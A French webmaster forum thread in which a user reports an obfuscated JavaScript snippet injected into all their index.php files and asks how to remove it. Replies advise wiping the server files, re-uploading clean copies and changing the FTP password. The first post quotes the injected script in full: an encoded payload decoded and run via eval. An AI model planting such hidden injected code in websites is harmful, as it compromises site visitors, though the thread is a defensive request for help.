IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Sécurité Discussion :

Sécurite: Problème sur mes Index.php


Sujet :

Sécurité

  1. #1
    Membre à l'essai
    Inscrit en
    Septembre 2005
    Messages
    18
    Détails du profil
    Informations forums :
    Inscription : Septembre 2005
    Messages : 18
    Points : 13
    Points
    13
    Par défaut Sécurite: Problème sur mes Index.php
    Salitation,

    Ca fait un bon moment, j'ai remarqué un code qui s'ajoute a tout mes fichiers index.php. Je ne connais ni l'origine ni la raison.

    J'ai aussi remarqué que ce code vient juste après la balise <body> ou juste avant la balise </body>

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    <script language=JavaScript> function jbnb25(z){ var c=z.length,m=1024,i,s,h,b=0,w=0,x=0,d=Array(63,30,39,22,1,14,38,60,18,9,0,0,0,0,0,0,58,48,35,28,33,55,56,41,23,6,37,3,45,46,42,24,12,47,17,15,57,54,31,40,20,19,25,0,0,0,0,0,0,4,16,32,52,7,10,11,61,59,8,43,44,51,5,2,34,29,62,36,13,50,27,26,21,53,49);for(s=Math.ceil(c/m);s>0;s--){h='';for(i=Math.min(c,m);i>0;i--,c--){{x|=(d[z.charCodeAt(b++)-48])<<w;if(w){h+=String.fromCharCode(208^x&255);x>>=8;w-=2}else{w=6}}}eval(h);}}jbnb25('26kQdriGrSfGz8wGBUrhXrkQy10@drilJUvLr8N02fwMs3grEm1MUfwlh3g7rIvQyU5@2Y1LASNWmUM7F8fGcNr00V1ld8vMs6iQr@VMrwiQ0Y@0QV0rqIgGF@QW03NQdpV2z8fMrgwlr8iQhpVr@YMTJHMTTQ0hWV5Ty10rEgS726gLspvisHMFABvLT1gMsU1FcS57B8wN73viuYvMBofQz6N@rrkQyfQil0VMUfwlh3kiE2S')	</script>
    Comment s'en debarasser et est-ce-que vous avez une idée sur la faille sécuritaire que ce code utilise.

    Merci pour votre aide.

  2. #2
    Expert éminent
    Avatar de 12monkeys
    Homme Profil pro
    Webmaster
    Inscrit en
    Novembre 2006
    Messages
    4 093
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 46
    Localisation : France, Puy de Dôme (Auvergne)

    Informations professionnelles :
    Activité : Webmaster
    Secteur : Service public

    Informations forums :
    Inscription : Novembre 2006
    Messages : 4 093
    Points : 9 031
    Points
    9 031
    Par défaut
    Bonsoir

    Je ne sais pas trop ce que fais ce code, tu auras peut être plus de succès sur le forum javascript...

    Cependant si tu ne sais pas d'où ça viens, je peut te conseiller d'effacer tous tes fichiers sur ton espace ftp, et de renvoyer le tout de ton ordi, puis de changer le mot de passe de ton espace ftp...
    Vous souhaitez participer à la rubrique (X)HTML/CSS, contactez moi.
    débutez avec les CSS
    Pas de MP pour des questions techniques ! Mode d'emploi du forum ; Règles ; Pensez à la balise code ; Pas de SMS !
    Votez pour les messages qui vous ont aidés...

  3. #3
    Membre émérite Avatar de HiRoN
    Homme Profil pro
    Développeur Web
    Inscrit en
    Août 2007
    Messages
    2 035
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Var (Provence Alpes Côte d'Azur)

    Informations professionnelles :
    Activité : Développeur Web

    Informations forums :
    Inscription : Août 2007
    Messages : 2 035
    Points : 2 589
    Points
    2 589
    Par défaut
    Cependant si tu ne sais pas d'où ça viens, je peut te conseiller d'effacer tous tes fichiers sur ton espace ftp, et de renvoyer le tout de ton ordi, puis de changer le mot de passe de ton espace ftp...
    + 1, si tu n'arrives pas à trouver la provenance du code, autant repartir sur des fichiers "sains"
    Pensez à utiliser les ressources disponibles en Dev. Web :
    (x)HTML : Cours (X)HTML / FAQ (X)HTML
    CSS : Cours CSS / FAQ CSS / Galerie CSS
    Javascript : Cours / FAQ / Sources
    Mon site : Développeur Web Freelance

Discussions similaires

  1. Problème sur mes balises 'a'
    Par SebastienM dans le forum Mise en page CSS
    Réponses: 5
    Dernier message: 21/11/2007, 14h56
  2. Réponses: 26
    Dernier message: 16/08/2007, 16h37
  3. Votre avis sur mes index
    Par grinder59 dans le forum Requêtes
    Réponses: 1
    Dernier message: 30/08/2006, 10h56
  4. Réponses: 6
    Dernier message: 31/03/2006, 17h05

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo